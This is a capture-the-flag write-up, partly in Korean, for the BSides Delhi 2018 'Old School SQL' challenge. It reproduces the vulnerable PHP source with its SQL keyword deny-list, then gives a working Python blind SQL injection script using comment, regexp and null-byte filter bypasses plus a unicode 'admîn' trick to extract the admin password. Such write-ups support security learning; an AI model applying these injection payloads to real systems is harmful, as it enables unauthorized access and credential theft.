
BSides Delhi CTF 2018 Old School SQL

JeonYoungSin 2018. 10. 29. 09:45

간단한 Sqli이다.


소스는 아래와 같다.


<?php 
// Challenge source as reproduced in the writeup. The defect is on the $query
// line: both GET parameters are interpolated straight into SQL, and the only
// control in front of them is a keyword deny-list.

include "./config.php";

include "./flag.php";

// Silences all PHP warnings/notices, so database errors never reach the page.
error_reporting(0);


// Case-insensitive (/i) deny-list applied to both parameters. A deny-list of
// SQL keywords is a weak control: any token or syntax it does not name passes
// through to the query unchanged. The mitigation is a prepared statement with
// bound parameters, not a longer list.
$black_list = "/admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\'|";

$black_list .= "=|_| |in|<|>|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";

// The request is rejected with ":P" when either parameter matches the deny-list.
if(preg_match($black_list, $_GET['user'])) exit(":P"); 

if(preg_match($black_list, $_GET['pw'])) exit(":P"); 



// SQL injection: $_GET[user] and $_GET[pw] are concatenated into the statement
// with no escaping or parameter binding (mysqli/PDO prepared statements would
// remove the injection regardless of the filter above).
$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'"; 


// ext/mysql (mysql_query / mysql_fetch_array) is deprecated and was removed in
// PHP 7; with error_reporting(0) a failed query silently yields false here.
$result = mysql_query($query);

$result = mysql_fetch_array($result);

// The admin password is stored and compared in plaintext (see the === below).
$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));

// Reflects the exact SQL text, including the raw GET values, back to the client.
echo "<h1>query : <strong><b>{$query}</b></strong><br></h1>";

// Echoing the matched row is what turns the injection into a boolean oracle:
// the page differs depending on whether the injected query returned a row.
if($result['user']) echo "<h2>Welcome {$result['user']}</h2>"; 

// The flag is printed only when the supplied pw is byte-for-byte equal (===)
// to the admin row's stored pw.
if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){

    echo $flag;

}


// Intentional source disclosure for the challenge.
highlight_file(__FILE__); 


?>


일단 필터가 그다지 빡세지가 않아서 \ , ;%00 , left , right, regexp , /**/ , ||, && 요정도 써서 블라인드로 어드민 패스워드 뽑아주면 된다.

 

그다음 user명에 admin을 지정해줄 때 unicode trick으로 admîn 요런식으로 넣어서 bypass해주면 플래그를 구할 수 있다.

 

import requests

def get_password(payload):
    """Boolean oracle used by the extraction loop below.

    Sends one GET request with ``user`` fixed to a single backslash and ``pw``
    set to *payload*, and returns True iff the response body contains the
    "Welcome admin" banner that the challenge source prints for a matched row.
    (Indentation reconstructed from the flattened paste.)
    """
    url = "http://35.200.215.237/"
    params = {'user': '\\','pw':payload}
    response = requests.get(url,params=params)
    if "Welcome admin" in response.text:
        return True
    else:
        return False

def get_flag(user,password):
    """Submit *user*/*password* once and print the raw response body.

    Python 2 syntax (``print`` statement). Indentation reconstructed from the
    flattened paste.
    """
    url = "http://35.200.215.237/"
    params = {'user':user,'pw':password}
    response = requests.get(url,params=params)
    print response.text


# Recovers the admin password one character at a time through the boolean
# oracle in get_password. Indentation reconstructed from the flattened paste;
# the trailing `if j==127` is placed at outer-loop level so that an inner loop
# that exhausts every candidate ends the outer loop.
admin_pw = ""
for i in range(1,100):          # 1-based character position within pw
    for j in range(32,128):     # candidate printable ASCII code
        # '?' and '*' are skipped — presumably because they are regexp
        # metacharacters; the writeup does not say.
        if chr(j)=="?" or chr(j)=="*":
            continue
        payload = "/**/||/**/user/**/regexp/**/0x5e61646d696e24/**/&&/**/right(left(pw,"+str(i)+"),1)/**/regexp/**/"+hex(j)+";\w00"
        if get_password(payload) == True:
            admin_pw += chr(j)
            break
    # No candidate matched at this position: the password is complete.
    if j==127:
        break

# The writeup's unicode trick: "admîn" does not contain the literal "admin"
# the deny-list looks for; whether the database treats it as equal to
# "admin" depends on its collation, which is not shown on this page.
get_flag("admîn",admin_pw)